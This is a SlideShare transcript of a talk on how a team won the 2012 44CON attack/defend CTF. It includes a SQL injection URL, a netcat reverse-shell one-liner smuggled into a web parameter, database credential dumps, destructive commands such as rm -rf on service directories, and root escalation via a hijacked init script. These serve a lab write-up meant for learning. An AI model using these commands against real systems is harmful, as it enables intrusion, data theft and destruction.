• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Playing 44CON CTF for fun and profit

Playing 44CON CTF for fun and profit



Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'

Rundown of what it took to win the MWRLabs 44CON CTF in 2012 by the winning team 'Three Headed Monkeys'



Total Views
Views on SlideShare
Embed Views



5 Embeds 195

http://44con.com 180
http://www.44con.com 7
http://staging.44con.com 4 3 1



Upload Details

Uploaded via as Adobe PDF

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

    Playing 44CON CTF for fun and profit Playing 44CON CTF for fun and profit Presentation Transcript

    • Playing the 44Con CTF for fun & profit
    • Me"Three Headed Monkeys"3hm@0xbadf00d.co.uk@impdefined
    • MeSoftware developer Trying not to make things worse Know a lot about bugsCTF team 0xbadf00dContributor to io.smashthestack.org
    • CTFSolving technical security challenges to getpoints."Its kind of like a Computer Science exam onacid"* * CSAW CTF "About"page
    • CTF TypesChallenge-based DEF CON quals Ghost In The Shellcode CSAW CTFAttack/defend DEF CON finals 44Con CTF (this year)
    • 44CON CTF
    • 44CON CTF - What we gotVirtual Machine imageIP AddressScope of "attackable" machines
    • Attack & DefendKind of like a pentest (maybe, Ive never done a pentest)I have a plan: Recon Harden Write exploits Run riot Get the girl Save the world
    • Step 1 - ReconId rather be offline than ownedSelf-reconCapture trafficQuick nmap of non-player servers
    • Recon - Services
    • Recon - Services
    • Recon - ScoringRegular "scoring rounds" Score server stores new keys in services Score server checks for previous keys?Every 30 minutes Not great if youre trying to see talks!
    • pastie
    • Pastie
    • Pastie
    • PastieWritten in PHPPastes stored in a MySQL database Recon shows keys are stored as pastesPHP+MySQL - Can you tell what the vuln isyet?
    • Pastie vuln
    • Pastie vuln C Classic SQL injection
    • Pastie fixIts not all pwnpwnpwnNot very sexyUpdated to use prepared statements
    • Pastie exploitI want keys!Had a look at my own DB to figure out thequery
    • Pastie exploit https://ip/view/%+and+lang+=+text+order +by+date+desc+--+
    • Pastie exploit
    • Pastie exploit - scripted
    • mailserver
    • MailserverSMTP and POP3 serverKeys are stored in emailsWritten in Ruby I dont know Ruby ~ 500 lines
    • Mailserver - vulnerability
    • Mailserver - vulnerability ???This just runs whatever Ruby code you give itTime to learn Ruby!
    • Mailserver - verificationLooking at the logs...
    • Mailserver - exploitationIm sure Ruby is lovely...... but lets just find some code to copy
    • Mailserver - exploitation
    • Mailserver - exploitation
    • Mailserver - scripted exploitation
    • auth
    • AuthRunning on port 23500
    • Auth
    • Auth - vulnerabilitySource analysis 101
    • Auth - exploitation
    • Auth - exploitationClassic stack buffer overflowOverwrite return address with value of mychoiceRemote code execution.........right?
    • Auth - exploitationWelcome to CTF rage
    • Auth - exploitation
    • Auth - exploitationJust put a valid writable address in the bufferptr!Easy if this was a 32bit process.Our memory space is annoying.
    • Auth - exploitationgdb$ info proc mapMapped address spaces: Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]
    • Auth - exploitationgdb$ info proc mapMapped address spaces: Start Addr End Addr Size Offset objfile0x0000000000 400000 0x0000000000403000 0x3000 0x0 /services/auth/auth0x0000000000 602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth0x0000000000 603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth0x0000000000 604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ......0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)
    • Auth - exploitationTimes up!No remote code execution :-(Very limited DoS Crash process Restarts automatically
    • servicemon
    • ServicemonWeb pageLooks like it monitors the other servicesRuby again
    • Servicemon - vulnerability Command execution of "filelist" parameter
    • Servicemon - exploitation Never mind keys, I want a shellcontestant@ubuntu:~$ nc -l 31337 -e /bin/shnc: invalid option -- e
    • Servicemon - exploitation *cracks knuckles*rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i2>&1|nc 31337 >/tmp/f http://ip:3000/hash?filelist=notafile||rm%20% 2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff% 3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh% 20-i%202>%261%7Cnc%20192.168.1.75% 2031337%20>%2Ftmp%2Ff
    • Servicemon - exploitationcontestant@ubuntu:~$ nc -lv 31337Connection from port 31337 [tcp/*]accepted$ whoamicontestant$ pwd/services/servicemon Now we can have some fun!
    • rampage
    • Steal all the keysmysql --user=sinatra --password=44ConCTF servicemon -e "selectstatus from statuses order by created_at desc limit 1;"mysql --user=pastie --password=J@cobsClub$ paste -e "selectpastie from pastie order by date desc limit 1;"OUTPUT=redis-cli -r 1 keys * | tail -n 1redis-cli -r 1 lrange $OUTPUT 0 1
    • Leave a calling cardecho Look behind you! A three-headed monkey! >/services/pastie/.win
    • Annoyecho export PROMPT_COMMAND="cd">> ~/.bashrcecho exit >> ~/.bashrcrm -rf /services
    • escalation
    • EscalationGetting keys is fineGetting shells is betterGetting root is best
    • Escalation - the hard way$ find /etc -writable/etc/init/mail.conf/etc/init/auth.conf
    • Escalation - the hard wayUSER PID TTY STAT COMMANDroot 8680 ? Ss /services/auth/auth
    • Escalation - the hard wayNext time auth respawns we will get a root shellLame DoS to the rescue!perl -e print "auth " . "A"x1100 . "n" | nc ip 23500Connection from port 31337 [tcp/*] accepted# whoamiroot
    • Escalation - the easy way220 Mail Service ready (33147)HELO250 Requested mail action okay, completedEXPN respond(client, `whoami`)root
    • summary
    • SummaryCTFs are fun! http://smashthestack.org - start with io http://overthewire.org http://hackthissite.org
    • questions